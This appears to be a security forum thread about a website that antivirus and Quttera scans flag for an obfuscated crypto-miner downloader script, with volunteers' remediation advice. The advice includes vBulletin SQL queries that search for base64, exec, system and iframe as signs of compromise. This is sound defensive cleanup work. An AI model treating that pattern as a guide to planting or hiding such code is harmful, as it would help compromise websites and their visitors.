Hello,
I have a blog post at wxw.egyptsonline.com and I’ve got Avast alert saying that it aborted connection on wxw.egyptsonline.com because it was infected with JS:Downloader-FJP [Trj].
Wait for a final verdict from an avast team member, as we here are just volunteers with relevant knowledge,
but cannot come and unblock, only avast team members can.
Quttera’s flags website as suspicious, but the original scan was clean.
Detected crypto miner - 23 suspicious files → https://quttera.com/detailed_report/www.egyptsonline.com
Exactly the obfuscated code I mentioned earlier from line 1751-1765
Detected is encoded JavaScript code, commonly used to hide suspicious behaviour,
crypto-miner…
Cleanse that miner script off of your website,
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Thank you very much for your responding.
I tried to remove many things but I still get the same alert, as well as avast prevent me to access your forum too.
Note: I bought my website template as it is without any changes, I don`t know why that happens now.
@ romanynazmy4
Your attached image would suggest that you have a javascript element somewhere on the site.
Response from that link wouldn’t be immediate and you may not get a direct response, but that link is monitored by the virus labs team. There may be a delay given it is a weekend.
As mentioned, we would have to wait for input from avast.
This malware has been with us since 2003 and since has seen new variants appear:
As soon as Trojan.Downloader.JS.Agent enters your computer system, it creates a file named %System%.exe, %temp%wininet.dll and then it starts to make changes to Windows Register, by changes and additions to the register.
So what is the nature of the obfuscated JavaScript code here?
To check a site for compromises follow these steps: (likewise routine, here meant for vbulletin)
Run Suspect File Diagnostics under Maintenance → Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can’t identify as belonging to your addons.
Check the config.php for any suspicious code. It isn’t checked by the suspect file diagnostic.
Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type
Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7
Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some “lite” or branded addons will include this as a means to prevent you from cheating the author. You’ll have to make a personal call on these if you use them. This is often a sign of a hacked site.
Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.
The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE ‘%base64%’ OR phpcode LIKE ‘%exec%’ OR phpcode LIKE ‘%system%’ OR phpcode like ‘%pass_thru%’ OR phpcode like ‘%iframe%’;
If you a plugin that you can’t read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.
Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE ‘%base64%’ OR template LIKE ‘%exec%’ OR template LIKE ‘%system%’ OR template like ‘%pass_thru%’ OR template like ‘%iframe%’;
It checks the templates for compromising code. You will need to review the results from this. If you can’t read it or the code is obfuscated then you should revert the template in the Admin CP.
Check .htaccess to make sure there are no redirects there.
Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
Info credits go to vbulletin support’s Trevor Hannant.
Main issue mentioned there: “The page loads 11 third-party JavaScript files and 11 CSS but does not employ Sub-Resource Integrity to prevent breach if a third-party CDN is compromised”.
Suspicious pattern detected twice. Also confirmed with the Quttera scan result.
No Pondus and polonus are different persons, but Pondus has been found many times to cooperate closely with polonus.
polonus is a third party cold reconnaissance scanner here in the Virus & Worms
while Pondus has a very fundamental knowledge of VirusTotal scan lore, which is often very helpful.
greetings from the surroundings of Rotterdam, Holland,